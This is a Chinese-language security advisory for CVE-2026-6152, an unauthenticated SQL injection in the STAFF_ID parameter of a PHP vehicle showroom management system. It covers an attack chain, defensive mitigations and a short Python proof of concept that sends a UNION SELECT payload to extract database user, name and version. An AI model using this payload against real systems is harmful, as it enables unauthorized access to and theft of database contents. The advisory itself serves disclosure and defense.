CVE-2026-6152 CVSS 7.3 高危

CVE-2026-6152 Vehicle Showroom SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6152

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Vehicle Showroom Management System

漏洞概述

该漏洞存在于code-projects发布的Vehicle Showroom Management System 1.0版本中。具体受影响的文件是`/util/StaffAddingFunction.php`，由于系统未对用户提交的`STAFF_ID`参数进行严格的输入验证和过滤，导致存在SQL注入漏洞。攻击者无需用户交互即可远程发起攻击，通过构造恶意SQL语句操纵数据库，可能导致敏感信息泄露、数据篡改甚至服务器被控制，对系统安全性构成严重威胁。

技术细节

漏洞的根本原因是在`/util/StaffAddingFunction.php`文件中，开发人员直接将用户可控的`STAFF_ID`参数拼接到SQL查询语句中，未实施任何有效的输入过滤或参数化查询机制。攻击者可以通过发送特制的HTTP请求（POST或GET），在`STAFF_ID`参数中注入包含SQL元字符（如单引号、注释符）的恶意载荷。由于CVSS向量显示攻击无需认证（PR:N）且无用户交互（UI:N），该漏洞极其容易被利用。成功利用后，攻击者可以执行任意SQL命令，导致数据库敏感信息（如管理员账户、客户数据）泄露，或者通过插入、更新命令破坏数据的完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者使用扫描工具或手动侦察发现目标站点运行的是Vehicle Showroom Management System 1.0。

STEP 2

2. 漏洞探测

攻击者针对`/util/StaffAddingFunction.php`端点发送探测请求，在`STAFF_ID`参数中插入单引号等特殊字符，观察服务器响应是否包含数据库错误信息。

STEP 3

3. 构造攻击载荷

确认存在注入后，攻击者构造UNION SELECT或其他SQL语句，旨在提取数据库结构、管理员密码哈希或敏感业务数据。

STEP 4

4. 数据窃取与利用

攻击者发送包含恶意SQL代码的POST请求，后端数据库执行命令并将结果返回给攻击者，导致数据泄露或系统被进一步控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-host/util/StaffAddingFunction.php"

# Malicious payload to test SQL injection
# Attempting to perform a boolean-based blind injection or error-based
payload = {
    "STAFF_ID": "1' UNION SELECT 1, user(), database(), version()--+"
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Response:")
        print(response.text[:500]) # Print first 500 chars of response
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Vehicle Showroom Management System 1.0

防御指南

临时缓解措施

建议立即部署Web应用防火墙（WAF）以拦截针对`/util/StaffAddingFunction.php`的SQL注入攻击流量。同时，作为临时缓解措施，可以在服务器层面通过URL重写规则限制对该文件的直接访问，或仅允许受信任的内网IP访问管理后台，直至完成代码修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6152
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6152
3 Details https://www.cvedetails.com/cve/CVE-2026-6152/
4 VulDB https://vuldb.com/cve/CVE-2026-6152
5 Link https://code-projects.org/
6 Link https://github.com/zheng-lv/CVE-/issues/3
7 Link https://vuldb.com/submit/796312
8 Link https://vuldb.com/vuln/357032
9 Link https://vuldb.com/vuln/357032/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表